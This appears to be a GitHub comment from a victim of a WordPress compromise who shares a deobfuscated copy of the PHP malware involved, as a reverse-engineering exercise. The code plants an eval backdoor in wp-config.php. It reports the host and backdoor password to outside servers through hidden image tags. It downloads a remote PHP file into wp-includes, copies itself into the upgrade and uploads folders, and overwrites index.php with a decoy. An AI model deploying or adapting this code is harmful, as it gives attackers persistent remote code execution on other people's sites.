I ended up getting hit by the same thing -- didn't notice until recently because the second half of the attack didn't take hold. I took a slightly different approach in reversal though, simplifying all the round(...) calls, and flattening the $GLOBALS and _1045629339 calls:

<?php
function l__0($_0)
{
    return urlencode(base64_encode(~$_0));
}
function l__1($_1)
{
    $_2[] = 'http://138.128.169.219/screenshots/.images/index.php';
    while (0)
        fgetcsv($_SERVER);
    $_2[] = 'http://kit4all.ru/components/com_jce/index.php';

    while (0)
        session_id($_1, $_3);
    $_3 = str_replace('wp-content/plugins/index.php', '', $_SERVER['REQUEST_URI']);
    $_4 = l__0($_SERVER['HTTP_HOST'] . $_3 . '|' . $_1);
    shuffle($_2);
    foreach ($_2 as $_5) {
        echo '<img width=1 height=1 src="' . $_5 . '?data=' . $_4 . '">';
        if (strpos('ufhpbedbwexa', 'fmz') !== false)
            file_exists($_SERVER, $_SERVER, $_6);
    }
}
@rename('../../wp-comments-post.php', '../../wp-commnets-post.php');
$_6 = '../../wp-config.php';
if (file_exists($_6)) {
    $_1 = substr(str_shuffle(str_repeat('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', 16)), 0, 16);
    $_7 = md5($_1);
    $_5 = "error_reporting(0);if(isset(\$_REQUEST['wpspm']) && md5(\$_REQUEST['wpspm']) == '$_7' && isset(\$_REQUEST['wprk'])) eval ( base64_decode (\$_REQUEST['wprk']));";
    file_put_contents("$_6", str_replace('$table_prefix', "$_5 \n \$table_prefix", file_get_contents($_6)));
    if (strpos('wcooadotjiqukbdqlne', 'lz') !== false)
        substr_replace($_5, $_0, $_2);
}
l__1($_1);
@copy('http://dapchemeng.org/1/ar/wksonew.php', '../../wp-includes/template-wploader.php');
$$_6 = __FILE__;
@copy('index.php', '../upgrade/upgrades.php');
@copy('index.php', '../uploads/wp-uploads.php');
$_8 = 'i';
@file_put_contents('index.php', '<?php\n// Silence is golden.\n?>');
@file_put_contents('../uploads/index.php', 'index.php');
if (0 && array_sum($_3, $_4, $_4))
    dir($_4, $_0, $_3, $_3);
echo "192485097bc8a240a96aca5968eae777";
?>

Thanks for posting, it was nice to see someone else's approach

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment